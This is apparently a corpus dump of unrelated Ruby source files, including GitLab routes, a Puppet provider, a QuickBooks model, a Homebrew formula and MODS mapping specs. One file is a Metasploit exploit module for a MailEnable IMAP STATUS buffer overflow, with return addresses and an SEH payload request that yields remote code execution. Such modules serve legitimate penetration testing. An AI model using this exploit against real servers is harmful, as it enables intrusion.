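# DRY alternative (not part of the original controller) would be a single
# parameterized scope on Place:
#
#   class Place < ActiveRecord::Base
#     scope :categoria_like, ->(fragment) { where('categoria like ?', "%#{fragment}%") }
#   end
#
#   # e.g. Place.categoria_like('otel').paginate(:page => params[:page])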
| 20.987179 | 173 | 0.651802 |
ffa0505bc36204d0f4328d749a0c538ca5461793 | 2,142 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Imap
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'MailEnable IMAPD (1.54) STATUS Request Buffer Overflow',
'Description' => %q{
MailEnable's IMAP server contains a buffer overflow
vulnerability in the STATUS command. With proper
credentials, this could allow for the execution of arbitrary
code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2005-2278'],
[ 'OSVDB', '17844'],
[ 'BID', '14243'],
[ 'URL', 'http://www.nessus.org/plugins/index.php?view=single&id=19193'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 450,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
['MailEnable 1.54 Pro Universal', { 'Rets' => [9273, 0x1001c019] }], #MEAISP.DLL
['Windows XP Pro SP0/SP1 English', { 'Rets' => [9273, 0x71aa32ad] }],
['Windows 2000 Pro English ALL', { 'Rets' => [9273, 0x75022ac4] }],
['Windows 2003 Server English', { 'Rets' => [9273, 0x7ffc0638] }],
],
'DisclosureDate' => 'Jul 13 2005',
'DefaultTarget' => 0))
end
def exploit
connect_login
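    # Request layout: a mailbox name truncated by an embedded NUL, Rets[0]
    # bytes of alphanumeric filler up to the SEH record, then the SEH payload
    # built around the Rets[1] handler address.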
seh = generate_seh_payload(target['Rets'][1])
buf = rand_text_alphanumeric(target['Rets'][0])
req = "a001 STATUS \".\x00" + buf + seh
req << "\" (UIDNEXT UIDVALIDITY MESSAGES UNSEEN RECENT)\r\n"
sock.put(req)
handler
disconnect
end
end
| 30.169014 | 92 | 0.548553 |
ac81a2aac7690c1a7043fec7403826d5bb22614b | 18,798 | require 'sidekiq/web'
require 'api/api'
Gitlab::Application.routes.draw do
if Gitlab::Sherlock.enabled?
namespace :sherlock do
resources :transactions, only: [:index, :show] do
resources :queries, only: [:show]
resources :file_samples, only: [:show]
collection do
delete :destroy_all
end
end
end
end
namespace :ci do
# CI API
Ci::API::API.logger Rails.logger
mount Ci::API::API => '/api'
resource :lint, only: [:show, :create]
resources :projects do
collection do
post :add
get :disabled
end
member do
get :status, to: 'projects#badge'
get :integration
post :toggle_shared_runners
end
resources :runner_projects, only: [:create, :destroy]
end
resource :user_sessions do
get :auth
get :callback
end
namespace :admin do
resources :runners, only: [:index, :show, :update, :destroy] do
member do
put :assign_all
get :resume
get :pause
end
end
resources :events, only: [:index]
resources :projects do
resources :runner_projects
end
resources :builds, only: :index
resource :application_settings, only: [:show, :update]
end
root to: 'projects#index'
end
use_doorkeeper do
controllers applications: 'oauth/applications',
authorized_applications: 'oauth/authorized_applications',
authorizations: 'oauth/authorizations'
end
# Autocomplete
get '/autocomplete/users' => 'autocomplete#users'
get '/autocomplete/users/:id' => 'autocomplete#user'
# Search
get 'search' => 'search#show'
get 'search/autocomplete' => 'search#autocomplete', as: :search_autocomplete
# API
API::API.logger Rails.logger
mount API::API => '/api'
# Get all keys of user
  get ':username.keys' => 'profiles/keys#get_keys', constraints: { username: /.*/ }
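  # e.g. GET /john.keys is handled by profiles/keys#get_keys for user "john"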
constraint = lambda { |request| request.env['warden'].authenticate? and request.env['warden'].user.admin? }
constraints constraint do
mount Sidekiq::Web, at: '/admin/sidekiq', as: :sidekiq
end
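  # The lambda above gates /admin/sidekiq to authenticated admins; any other
  # request falls through to the routes below.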
# Enable Grack support
mount Grack::AuthSpawner, at: '/', constraints: lambda { |request| /[-\/\w\.]+\.git\//.match(request.path_info) }, via: [:get, :post, :put]
# Help
get 'help' => 'help#index'
get 'help/:category/:file' => 'help#show', as: :help_page, constraints: { category: /.*/, file: /[^\/\.]+/ }
get 'help/shortcuts'
get 'help/ui' => 'help#ui'
#
# Global snippets
#
resources :snippets do
member do
get 'raw'
end
end
get '/s/:username' => 'snippets#index', as: :user_snippets, constraints: { username: /.*/ }
#
# Invites
#
resources :invites, only: [:show], constraints: { id: /[A-Za-z0-9_-]+/ } do
member do
post :accept
match :decline, via: [:get, :post]
end
end
# Spam reports
resources :abuse_reports, only: [:new, :create]
#
# Import
#
namespace :import do
resource :github, only: [:create, :new], controller: :github do
get :status
get :callback
get :jobs
end
resource :gitlab, only: [:create, :new], controller: :gitlab do
get :status
get :callback
get :jobs
end
resource :bitbucket, only: [:create, :new], controller: :bitbucket do
get :status
get :callback
get :jobs
end
resource :gitorious, only: [:create, :new], controller: :gitorious do
get :status
get :callback
get :jobs
end
resource :google_code, only: [:create, :new], controller: :google_code do
get :status
post :callback
get :jobs
get :new_user_map, path: :user_map
post :create_user_map, path: :user_map
end
resource :fogbugz, only: [:create, :new], controller: :fogbugz do
get :status
post :callback
get :jobs
get :new_user_map, path: :user_map
post :create_user_map, path: :user_map
end
end
#
# Uploads
#
scope path: :uploads do
# Note attachments and User/Group/Project avatars
get ":model/:mounted_as/:id/:filename",
to: "uploads#show",
constraints: { model: /note|user|group|project/, mounted_as: /avatar|attachment/, filename: /[^\/]+/ }
# Project markdown uploads
get ":namespace_id/:project_id/:secret/:filename",
to: "projects/uploads#show",
constraints: { namespace_id: /[a-zA-Z.0-9_\-]+/, project_id: /[a-zA-Z.0-9_\-]+/, filename: /[^\/]+/ }
end
# Redirect old note attachments path to new uploads path.
get "files/note/:id/:filename",
to: redirect("uploads/note/attachment/%{id}/%{filename}"),
constraints: { filename: /[^\/]+/ }
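  # e.g. GET /files/note/42/report.pdf now redirects to
  # /uploads/note/attachment/42/report.pdf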
#
# Explore area
#
namespace :explore do
resources :projects, only: [:index] do
collection do
get :trending
get :starred
end
end
resources :groups, only: [:index]
resources :snippets, only: [:index]
root to: 'projects#trending'
end
# Compatibility with old routing
get 'public' => 'explore/projects#index'
get 'public/projects' => 'explore/projects#index'
#
# Admin Area
#
namespace :admin do
resources :users, constraints: { id: /[a-zA-Z.\/0-9_\-]+/ } do
resources :keys, only: [:show, :destroy]
resources :identities, only: [:index, :edit, :update, :destroy]
delete 'stop_impersonation' => 'impersonation#destroy', on: :collection
member do
get :projects
get :keys
get :groups
put :team_update
put :block
put :unblock
put :unlock
put :confirm
post 'impersonate' => 'impersonation#create'
patch :disable_two_factor
delete 'remove/:email_id', action: 'remove_email', as: 'remove_email'
end
end
resources :abuse_reports, only: [:index, :destroy]
resources :applications
resources :groups, constraints: { id: /[^\/]+/ } do
member do
put :members_update
end
end
resources :deploy_keys, only: [:index, :new, :create, :destroy]
resources :hooks, only: [:index, :create, :destroy] do
get :test
end
resources :broadcast_messages, only: [:index, :create, :destroy]
resource :logs, only: [:show]
resource :background_jobs, controller: 'background_jobs', only: [:show]
resources :namespaces, path: '/projects', constraints: { id: /[a-zA-Z.0-9_\-]+/ }, only: [] do
root to: 'projects#index', as: :projects
resources(:projects,
path: '/',
constraints: { id: /[a-zA-Z.0-9_\-]+/ },
only: [:index, :show]) do
root to: 'projects#show'
member do
put :transfer
end
end
end
resource :application_settings, only: [:show, :update] do
resources :services
end
resources :labels
root to: 'dashboard#index'
end
#
# Profile Area
#
resource :profile, only: [:show, :update] do
member do
get :audit_log
get :applications
put :reset_private_token
put :update_username
end
scope module: :profiles do
resource :account, only: [:show, :update] do
member do
delete :unlink
end
end
resource :notifications, only: [:show, :update]
resource :password, only: [:new, :create, :edit, :update] do
member do
put :reset
end
end
resource :preferences, only: [:show, :update]
resources :keys
resources :emails, only: [:index, :create, :destroy]
resource :avatar, only: [:destroy]
resource :two_factor_auth, only: [:new, :create, :destroy] do
member do
post :codes
end
end
end
end
get 'u/:username/calendar' => 'users#calendar', as: :user_calendar,
constraints: { username: /.*/ }
get 'u/:username/calendar_activities' => 'users#calendar_activities', as: :user_calendar_activities,
constraints: { username: /.*/ }
get '/u/:username' => 'users#show', as: :user,
constraints: { username: /[a-zA-Z.0-9_\-]+(?<!\.atom)/ }
#
# Dashboard Area
#
resource :dashboard, controller: 'dashboard', only: [] do
get :issues
get :merge_requests
get :activity
scope module: :dashboard do
resources :milestones, only: [:index, :show]
resources :groups, only: [:index]
resources :snippets, only: [:index]
resources :projects, only: [:index] do
collection do
get :starred
end
end
end
root to: "dashboard/projects#index"
end
#
# Groups Area
#
resources :groups, constraints: { id: /[a-zA-Z.0-9_\-]+(?<!\.atom)/ } do
member do
get :issues
get :merge_requests
get :projects
end
scope module: :groups do
resources :group_members, only: [:index, :create, :update, :destroy] do
post :resend_invite, on: :member
delete :leave, on: :collection
end
resource :avatar, only: [:destroy]
resources :milestones, only: [:index, :show, :update, :new, :create]
end
end
resources :projects, constraints: { id: /[^\/]+/ }, only: [:index, :new, :create]
devise_for :users, controllers: { omniauth_callbacks: :omniauth_callbacks, registrations: :registrations , passwords: :passwords, sessions: :sessions, confirmations: :confirmations }
devise_scope :user do
get '/users/auth/:provider/omniauth_error' => 'omniauth_callbacks#omniauth_error', as: :omniauth_error
end
root to: "root#index"
#
# Project Area
#
resources :namespaces, path: '/', constraints: { id: /[a-zA-Z.0-9_\-]+/ }, only: [] do
resources(:projects, constraints: { id: /[a-zA-Z.0-9_\-]+(?<!\.atom)/ }, except:
[:new, :create, :index], path: "/") do
member do
put :transfer
delete :remove_fork
post :archive
post :unarchive
post :toggle_star
post :markdown_preview
get :autocomplete_sources
get :activity
end
scope module: :projects do
# Blob routes:
get '/new/*id', to: 'blob#new', constraints: { id: /.+/ }, as: 'new_blob'
post '/create/*id', to: 'blob#create', constraints: { id: /.+/ }, as: 'create_blob'
get '/edit/*id', to: 'blob#edit', constraints: { id: /.+/ }, as: 'edit_blob'
put '/update/*id', to: 'blob#update', constraints: { id: /.+/ }, as: 'update_blob'
post '/preview/*id', to: 'blob#preview', constraints: { id: /.+/ }, as: 'preview_blob'
scope do
get(
'/blob/*id/diff',
to: 'blob#diff',
constraints: { id: /.+/, format: false },
as: :blob_diff
)
get(
'/blob/*id',
to: 'blob#show',
constraints: { id: /.+/, format: false },
as: :blob
)
delete(
'/blob/*id',
to: 'blob#destroy',
constraints: { id: /.+/, format: false }
)
put(
'/blob/*id',
to: 'blob#update',
constraints: { id: /.+/, format: false }
)
post(
'/blob/*id',
to: 'blob#create',
constraints: { id: /.+/, format: false }
)
end
scope do
get(
'/raw/*id',
to: 'raw#show',
constraints: { id: /.+/, format: /(html|js)/ },
as: :raw
)
end
scope do
get(
'/tree/*id',
to: 'tree#show',
constraints: { id: /.+/, format: /(html|js)/ },
as: :tree
)
end
scope do
post(
'/create_dir/*id',
to: 'tree#create_dir',
constraints: { id: /.+/ },
as: 'create_dir'
)
end
scope do
get(
'/blame/*id',
to: 'blame#show',
constraints: { id: /.+/, format: /(html|js)/ },
as: :blame
)
end
scope do
get(
'/commits/*id',
to: 'commits#show',
constraints: { id: /(?:[^.]|\.(?!atom$))+/, format: /atom/ },
as: :commits
)
end
resource :avatar, only: [:show, :destroy]
resources :commit, only: [:show], constraints: { id: /[[:alnum:]]{6,40}/ } do
member do
get :branches
get :builds
post :cancel_builds
post :retry_builds
end
end
resources :compare, only: [:index, :create]
resources :network, only: [:show], constraints: { id: /(?:[^.]|\.(?!json$))+/, format: /json/ }
resources :graphs, only: [:show], constraints: { id: /(?:[^.]|\.(?!json$))+/, format: /json/ } do
member do
get :commits
get :ci
end
end
get '/compare/:from...:to' => 'compare#show', :as => 'compare',
:constraints => { from: /.+/, to: /.+/ }
resources :snippets, constraints: { id: /\d+/ } do
member do
get 'raw'
end
end
WIKI_SLUG_ID = { id: /[a-zA-Z.0-9_\-\/]+/ } unless defined? WIKI_SLUG_ID
scope do
# Order matters to give priority to these matches
get '/wikis/git_access', to: 'wikis#git_access'
get '/wikis/pages', to: 'wikis#pages', as: 'wiki_pages'
post '/wikis', to: 'wikis#create'
get '/wikis/*id/history', to: 'wikis#history', as: 'wiki_history', constraints: WIKI_SLUG_ID
get '/wikis/*id/edit', to: 'wikis#edit', as: 'wiki_edit', constraints: WIKI_SLUG_ID
get '/wikis/*id', to: 'wikis#show', as: 'wiki', constraints: WIKI_SLUG_ID
delete '/wikis/*id', to: 'wikis#destroy', constraints: WIKI_SLUG_ID
put '/wikis/*id', to: 'wikis#update', constraints: WIKI_SLUG_ID
end
resource :repository, only: [:show, :create] do
member do
get 'archive', constraints: { format: Gitlab::Regex.archive_formats_regex }
end
end
resources :services, constraints: { id: /[^\/]+/ }, only: [:index, :edit, :update] do
member do
get :test
end
end
resources :deploy_keys, constraints: { id: /\d+/ }, only: [:index, :new, :create] do
member do
put :enable
put :disable
end
end
resource :fork, only: [:new, :create]
resource :import, only: [:new, :create, :show]
resources :refs, only: [] do
collection do
get 'switch'
end
member do
# tree viewer logs
get 'logs_tree', constraints: { id: Gitlab::Regex.git_reference_regex }
        # Directories with leading dots erroneously get rejected if the git
        # ref regex is used in constraints, so regex verification is done in the controller.
get 'logs_tree/*path' => 'refs#logs_tree', as: :logs_file, constraints: {
id: /.*/,
path: /.*/
}
end
end
resources :merge_requests, constraints: { id: /\d+/ }, except: [:destroy] do
member do
get :diffs
get :commits
post :merge
get :merge_check
get :ci_status
post :toggle_subscription
end
collection do
get :branch_from
get :branch_to
get :update_branches
end
end
resources :branches, only: [:index, :new, :create, :destroy], constraints: { id: Gitlab::Regex.git_reference_regex }
resources :tags, only: [:index, :show, :new, :create, :destroy], constraints: { id: Gitlab::Regex.git_reference_regex } do
resource :release, only: [:edit, :update]
end
resources :protected_branches, only: [:index, :create, :update, :destroy], constraints: { id: Gitlab::Regex.git_reference_regex }
resource :variables, only: [:show, :update]
resources :triggers, only: [:index, :create, :destroy]
resource :ci_settings, only: [:edit, :update, :destroy]
resources :ci_web_hooks, only: [:index, :create, :destroy] do
member do
get :test
end
end
resources :ci_services, constraints: { id: /[^\/]+/ }, only: [:index, :edit, :update] do
member do
get :test
end
end
resources :builds, only: [:index, :show] do
collection do
post :cancel_all
end
member do
get :status
post :cancel
get :download
post :retry
end
end
resources :hooks, only: [:index, :create, :destroy], constraints: { id: /\d+/ } do
member do
get :test
end
end
resources :milestones, constraints: { id: /\d+/ } do
member do
put :sort_issues
put :sort_merge_requests
end
end
resources :labels, constraints: { id: /\d+/ } do
collection do
post :generate
end
end
resources :issues, constraints: { id: /\d+/ }, except: [:destroy] do
member do
post :toggle_subscription
end
collection do
post :bulk_update
end
end
resources :project_members, except: [:new, :edit], constraints: { id: /[a-zA-Z.\/0-9_\-#%+]+/ } do
collection do
delete :leave
          # Used for importing a team
          # from another project
get :import
post :apply_import
end
member do
post :resend_invite
end
end
resources :notes, only: [:index, :create, :destroy, :update], constraints: { id: /\d+/ } do
member do
delete :delete_attachment
end
collection do
post :award_toggle
end
end
resources :uploads, only: [:create] do
collection do
get ":secret/:filename", action: :show, as: :show, constraints: { filename: /[^\/]+/ }
end
end
resources :runners, only: [:index, :edit, :update, :destroy, :show] do
member do
get :resume
get :pause
end
end
end
end
end
get ':id' => 'namespaces#show', constraints: { id: /(?:[^.]|\.(?!atom$))+/, format: /atom/ }
end
| 27.204052 | 184 | 0.537717 |
bfddea2ccd776e6ef47bdec5c370721fc4dacefb | 1,584 | require 'puppet/provider/mikrotik_api'
Puppet::Type.type(:mikrotik_interface_bridge).provide(:mikrotik_api, :parent => Puppet::Provider::Mikrotik_Api) do
confine :feature => :mtik
mk_resource_methods
def self.instances
interfaces = Puppet::Provider::Mikrotik_Api::get_all("/interface/bridge")
instances = interfaces.collect { |interface| interface(interface) }
instances
end
def self.interface(data)
if data['disabled'] == "true"
state = :disabled
else
state = :enabled
end
new(
:ensure => :present,
:state => state,
:name => data['name'],
:mtu => data['mtu'],
:arp => data['arp'],
:arp_timeout => data['arp-timeout'],
:admin_mac => data['admin-mac']
)
end
def flush
Puppet.debug("Flushing Bridge #{resource[:name]}")
params = {}
if @property_hash[:state] == :disabled
params["disabled"] = 'yes'
elsif @property_hash[:state] == :enabled
params["disabled"] = 'no'
end
params["name"] = resource[:name]
params["mtu"] = resource[:mtu] if ! resource[:mtu].nil?
params["arp"] = resource[:arp] if ! resource[:arp].nil?
params["arp-timeout"] = resource[:arp_timeout] if ! resource[:arp_timeout].nil?
params["admin-mac"] = resource[:admin_mac] if ! resource[:admin_mac].nil?
lookup = {}
lookup["name"] = resource[:name]
Puppet.debug("Params: #{params.inspect} - Lookup: #{lookup.inspect}")
simple_flush("/interface/bridge", params, lookup)
end
end | 28.285714 | 114 | 0.600379 |
f71a8e64b2595bab3748e01e5bdaa2a77a3e6a15 | 223 | require "rails_helper"
RSpec.describe HearingType, type: :model do
it { is_expected.to belong_to(:casa_org) }
it { is_expected.to validate_presence_of(:active) }
it { is_expected.to validate_presence_of(:name) }
end
| 27.875 | 53 | 0.757848 |
61c6a4c8acb353bbbb62f8417cb6f7cff152a018 | 1,943 | module Quickbooks
module Model
class PurchaseOrder < BaseModel
include GlobalTaxCalculation
#== Constants
REST_RESOURCE = 'purchaseorder'
XML_COLLECTION_NODE = "PurchaseOrder"
XML_NODE = "PurchaseOrder"
xml_accessor :id, :from => 'Id', :as => Integer
xml_accessor :sync_token, :from => 'SyncToken', :as => Integer
xml_accessor :meta_data, :from => 'MetaData', :as => MetaData
xml_accessor :doc_number, :from => 'DocNumber'
xml_accessor :txn_date, :from => 'TxnDate', :as => Date
xml_accessor :custom_fields, :from => 'CustomField', :as => [CustomField]
xml_accessor :private_note, :from => 'PrivateNote'
xml_accessor :linked_transactions, :from => 'LinkedTxn', :as => [LinkedTransaction]
xml_accessor :line_items, :from => 'Line', :as => [PurchaseLineItem]
xml_accessor :attachable_ref, :from => 'AttachableRef', :as => BaseReference
xml_accessor :vendor_ref, :from => 'VendorRef', :as => BaseReference
xml_accessor :ap_account_ref, :from => 'APAccountRef', :as => BaseReference
xml_accessor :class_ref, :from => 'ClassRef', :as => BaseReference
xml_accessor :sales_term_ref, :from => 'SalesTermRef', :as => BaseReference
xml_accessor :total_amount, :from => 'TotalAmt', :as => BigDecimal, :to_xml => Proc.new { |val| val.to_f }
xml_accessor :due_date, :from => 'DueDate', :as => Date
xml_accessor :vendor_address, :from => 'VendorAddr', :as => PhysicalAddress
xml_accessor :ship_address, :from => 'ShipAddr', :as => PhysicalAddress
xml_accessor :ship_method_ref, :from => 'ShipMethodRef', :as => BaseReference
xml_accessor :po_status, :from => 'POStatus'
xml_accessor :txn_tax_detail, :from => 'TxnTaxDetail', :as => TransactionTaxDetail
reference_setters :attachable_ref, :vendor_ref, :ap_account_ref, :class_ref, :sales_term_ref, :ship_method_ref
end
end
end
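# Usage sketch: reference_setters follows the quickbooks-ruby convention of
# generating id-based writers for each listed reference (assumed here to be
# e.g. #vendor_id=), so a purchase order can be wired up roughly like:
#
#   po = Quickbooks::Model::PurchaseOrder.new
#   po.vendor_id = 42                      # becomes the VendorRef BaseReference
#   po.total_amount = BigDecimal('150.00')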
| 47.390244 | 116 | 0.672156 |
033fe054283fed849c872c1e53daf43d1f6bf690 | 979 | # -*- encoding: utf-8 -*-
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'rubycas-server-core/version'
Gem::Specification.new do |gem|
gem.name = "rubycas-server-core"
gem.version = RubyCAS::Server::Core::Version::STRING
gem.authors = ["Robert Mitwicki", 'Tyler Pickett']
gem.email = ["[email protected]", '[email protected]']
gem.description = %q{The core logic for handling CAS requests independent of any web presentation technology.}
gem.summary = %q{The core logic for handling CAS requests.}
gem.homepage = "http://rubycas.github.com"
gem.files = `git ls-files`.split($/)
gem.executables = gem.files.grep(%r{^bin/}).map{ |f| File.basename(f) }
gem.test_files = gem.files.grep(%r{^(test|spec|features)/})
gem.require_paths = ["lib"]
gem.add_dependency "r18n-core"
gem.add_dependency "activesupport", ">= 3.0"
end
| 42.565217 | 114 | 0.664964 |
d58f8ecf28b580eb140a06f21af93112953ff288 | 1,896 | require 'setka/workflow/version'
# Ruby implementation of the Setka Workflow API for integrating an external
# publishing platform written in Ruby with Setka Workflow.
#
# First of all, an access token should be obtained. This can be accomplished
# on the Integration page of Settings
# (https://workflow.setka.io/spacename/settings/api,
# where spacename is the name of your space).
module Setka
module Workflow
autoload :Client, 'setka/workflow/client'
autoload :Request, 'setka/workflow/request'
autoload :Response, 'setka/workflow/response'
autoload :Configuration, 'setka/workflow/configuration'
autoload :Resource, 'setka/workflow/resource'
autoload :Ticket, 'setka/workflow/ticket'
autoload :Category, 'setka/workflow/category'
BASE_ENDPOINT = 'workflow.setka.io'.freeze
# Current default version of API
API_VERSION = 3
# Basic Workflow error
Error = Class.new(StandardError)
# This error is thrown when your client has not been configured
ConfigurationError = Class.new(Error)
# This error is thrown when format of the param is wrong
WrongParamError = Class.new(Error)
# This error is thrown when access token is invalid
InvalidAccessToken = Class.new(Error)
# This error is thrown when Setka Workflow responds with 500
InternalServerError = Class.new(Error)
# Clears current client
def self.reset!
@client = nil
end
# Gets current client
def self.client
@client ||= Setka::Workflow::Client.new
end
# Workflow client configuration in the global manner
def self.configure(&block)
reset!
client.configure(&block)
end
def self.logger
@logger ||= Logger.new(STDOUT)
end
# Sets custom logger
def self.logger=(logger)
@logger = logger
end
end
end
| 28.298507 | 72 | 0.684072 |
4a359aa9b7aa5ca9077ec565a2cf3ca1ca92e309 | 1,750 | class Zshdb < Formula
desc "Debugger for zsh"
homepage "https://github.com/rocky/zshdb"
url "https://downloads.sourceforge.net/project/bashdb/zshdb/1.1.2/zshdb-1.1.2.tar.gz"
sha256 "bf9cb36f60ce6833c5cd880c58d6741873b33f5d546079eebcfce258d609e9af"
license "GPL-3.0"
# We check the "zshdb" directory page because the bashdb project contains
# various software and zshdb releases may be pushed out of the SourceForge
# RSS feed.
livecheck do
url "https://sourceforge.net/projects/bashdb/files/zshdb/"
strategy :page_match
regex(%r{href=(?:["']|.*?zshdb/)?v?(\d+(?:[.-]\d+)+)/?["' >]}i)
end
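  # e.g. the regex above captures "1.1.2" from hrefs like
  # ".../bashdb/files/zshdb/1.1.2/" on the listing page.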
bottle do
cellar :any_skip_relocation
sha256 "192eac5cebd479f637b5a0d6ea50abb908f0ab2453b570e9888a16f1c5eea1ec" => :big_sur
sha256 "388da120bb13ac218a9940ac65353776836a05a1d7b22b464d87800d5b7a8f91" => :arm64_big_sur
sha256 "2bdc583e95b4d4bd92624d48ce804561e3a337792dbba74f451a2507eb939704" => :catalina
sha256 "2bdc583e95b4d4bd92624d48ce804561e3a337792dbba74f451a2507eb939704" => :mojave
sha256 "2bdc583e95b4d4bd92624d48ce804561e3a337792dbba74f451a2507eb939704" => :high_sierra
end
head do
url "https://github.com/rocky/zshdb.git"
depends_on "autoconf" => :build
depends_on "automake" => :build
end
depends_on "zsh"
def install
system "./autogen.sh" if build.head?
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}",
"--with-zsh=#{HOMEBREW_PREFIX}/bin/zsh"
system "make", "install"
end
test do
require "open3"
Open3.popen3("#{bin}/zshdb -c 'echo test'") do |stdin, stdout, _|
stdin.write "exit\n"
assert_match(/That's all, folks/, stdout.read)
end
end
end
| 34.313725 | 95 | 0.698286 |
b917e8629f597f797f3ca6ecf15d21fa2a518c68 | 329 | require "ruby-cbc/version"
require "cbc-wrapper"
module Cbc
end
files = %w[
conflict_solver
model
problem
version
ilp/constant
ilp/constraint
ilp/objective
ilp/term
ilp/term_array
ilp/var
utils/compressed_row_storage
]
files.each do |file|
require File.expand_path("../ruby-cbc/#{file}", __FILE__)
end
| 13.708333 | 59 | 0.723404 |
f7bf4a41299962fb95253960abf9e9bf8304b72a | 37,827 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe 'MODS titleInfo <--> cocina mappings' do
describe 'Basic title' do
# How to ID: only subelement of titleInfo is title and no titleInfo type attribute
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo>
<title>Gaudy night</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
value: 'Gaudy night'
}
]
}
end
end
end
describe 'Title with parts' do
# How to ID: multiple subelements in titleInfo
# NOTE: the nonsorting character count should be the number of characters in the nonsorting characters value plus 1
# unless the nonsorting characters value ends with an apostrophe or a hyphen.
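    # e.g. nonSort "The" (followed by a space) yields a count of 4, while a
    # nonSort ending in an apostrophe such as "L'" yields a count of 2.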
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo>
<nonSort>The</nonSort>
<title>journal of stuff</title>
<subTitle>a journal</subTitle>
<partNumber>volume 5</partNumber>
<partName>special issue</partName>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
structuredValue: [
{
value: 'The',
type: 'nonsorting characters'
},
{
value: 'journal of stuff',
type: 'main title'
},
{
value: 'a journal',
type: 'subtitle'
},
{
value: 'volume 5',
type: 'part number'
},
{
value: 'special issue',
type: 'part name'
}
],
note: [
{
value: '4',
type: 'nonsorting character count'
}
]
}
]
}
end
end
end
describe 'Alternative title' do
# How to ID: titleInfo type="alternative"
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo usage="primary">
<title>Five red herrings</title>
</titleInfo>
<titleInfo type="alternative">
<title>Suspicious characters</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
value: 'Five red herrings',
status: 'primary'
},
{
value: 'Suspicious characters',
type: 'alternative'
}
]
}
end
end
end
describe 'Translated title' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo usage="primary" lang="fre" altRepGroup="1">
<title>Les misérables</title>
</titleInfo>
<titleInfo type="translated" lang="eng" altRepGroup="1">
<title>The wretched</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
parallelValue: [
{
value: 'Les misérables',
status: 'primary',
valueLanguage: {
code: 'fre',
source: {
code: 'iso639-2b'
}
}
},
{
value: 'The wretched',
valueLanguage: {
code: 'eng',
source: {
code: 'iso639-2b'
}
},
type: 'translated'
}
]
}
]
}
end
end
end
describe 'Translated title (title is structuredValue)' do
# How to ID: titleInfo type="translated"
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo usage="primary" lang="fre" altRepGroup="1">
<nonSort>Les</nonSort>
<title>misérables</title>
</titleInfo>
<titleInfo type="translated" lang="eng" altRepGroup="1">
<nonSort>The</nonSort>
<title>wretched</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
parallelValue: [
{
structuredValue: [
{
value: 'Les',
type: 'nonsorting characters'
},
{
value: 'misérables',
type: 'main title'
}
],
note: [
{
value: '4',
type: 'nonsorting character count'
}
],
status: 'primary',
valueLanguage: {
code: 'fre',
source: {
code: 'iso639-2b'
}
}
},
{
structuredValue: [
{
value: 'The',
type: 'nonsorting characters'
},
{
value: 'wretched',
type: 'main title'
}
],
note: [
{
value: '4',
type: 'nonsorting character count'
}
],
valueLanguage: {
code: 'eng',
source: {
code: 'iso639-2b'
}
},
type: 'translated'
}
]
}
]
}
end
end
end
describe 'Transliterated title (title is value)' do
# How to ID: presence of titleInfo transliteration attribute (may need to manually review all records with a
# titleInfo script element to catch additional instances)
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo usage="primary" lang="rus" script="Cyrl" altRepGroup="1">
<title>Война и миръ</title>
</titleInfo>
<titleInfo type="translated" lang="rus" script="Latn" transliteration="ALA-LC Romanization Tables" altRepGroup="1">
<title>Voĭna i mir</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
parallelValue: [
{
value: 'Война и миръ',
status: 'primary',
valueLanguage: {
code: 'rus',
source: {
code: 'iso639-2b'
},
valueScript: {
code: 'Cyrl',
source: {
code: 'iso15924'
}
}
}
},
{
value: 'Voĭna i mir',
valueLanguage: {
code: 'rus',
source: {
code: 'iso639-2b'
},
valueScript: {
code: 'Latn',
source: {
code: 'iso15924'
}
}
},
type: 'transliterated',
standard: {
value: 'ALA-LC Romanization Tables'
}
}
]
}
]
}
end
end
end
describe 'Transliterated title (not parallel)' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo transliteration="ALA-LC Romanization Tables">
<title>Mā baʻda 1930</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
value: 'Mā baʻda 1930',
type: 'transliterated',
standard: {
value: 'ALA-LC Romanization Tables'
}
}
]
}
end
end
end
describe 'Uniform title with authority' do
# How to ID: titleInfo type="uniform"
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo usage="primary">
<title>Hamlet</title>
</titleInfo>
<titleInfo type="uniform" authority="naf" authorityURI="http://id.loc.gov/authorities/names/"
valueURI="http://id.loc.gov/authorities/names/n80008522" nameTitleGroup="1">
<title>Hamlet</title>
</titleInfo>
<name usage="primary" type="personal" authority="naf" authorityURI="http://id.loc.gov/authorities/names/"
valueURI="http://id.loc.gov/authorities/names/n78095332" nameTitleGroup="1">
<namePart>Shakespeare, William, 1564-1616</namePart>
</name>
XML
end
let(:cocina) do
{
title: [
{
value: 'Hamlet',
status: 'primary'
},
{
structuredValue: [
{
value: 'Hamlet',
type: 'title'
},
{
value: 'Shakespeare, William, 1564-1616',
type: 'name',
uri: 'http://id.loc.gov/authorities/names/n78095332',
source: {
uri: 'http://id.loc.gov/authorities/names/',
code: 'naf'
}
}
],
